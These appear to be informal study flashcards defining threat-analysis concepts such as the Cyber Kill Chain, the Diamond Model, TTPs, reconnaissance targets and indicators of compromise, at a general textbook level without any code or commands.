Information Gathering and Vulnerability Scanning Flashcards
Cyber Kill Chain
- Reconnaissance
- Weaponisation
Reconnaissance
- Social Media
- Website
- Whois
- DNS
- Footprint
- Open ports
Weaponisation
The attacker is going through the information gathered and identify techniques that can be used to gain access.
Delivery
Exploitation
Installation
Install malicious payload, backdoor
Command and Control
Two way communication. Privilege escalation. Hide the evidence of my compromise using encryption. Command and control your system
Action on Objective
Diamond Model
Provides a structure for identifying correlated groups of events. Efficient methods to stop attracts while increasing analytic productivity:
- Adversary
- Infrastructure
- Capability
- Victim
TTPs
Tactics, Techniques and Procedures
Activities and patterns that attackers would utilise.
Tactics
The way that attackers operate during an attack.
Techniques
The techniques used by hackers during their exploitation.
Procedures
Sequence of actions performed by an attacker to gain or achieve certain goals throughout their attack lifecycle.
Internal Reconnaissance
Enumeration
What kind of does the targeted organisation have:
- OS
- Services
- Apps and versions
- Hosts
- Processes
- User accounts
- IP addresses
Adversary Behavioural Identification
- Internal Reconnaissance
- PowerShell
- CLI processes
- Suspicious proxy events
- HTTP user agent
- C&C servers
DNS tunneling
Use DNS to tunnel and hide my malicious traffic
Web-shells
You can use web-shells to control we servers
Data Staging
Indicator of Compromise
- Unauthorised software and files
- Suspicious emails
- Suspicious registry entries and file system changes
- Unknown ports and protocol usage
- Excessive bandwidth usage
- Rogue hardware
- Service disruption and defacement
- Suspicious or unauthorised account usage
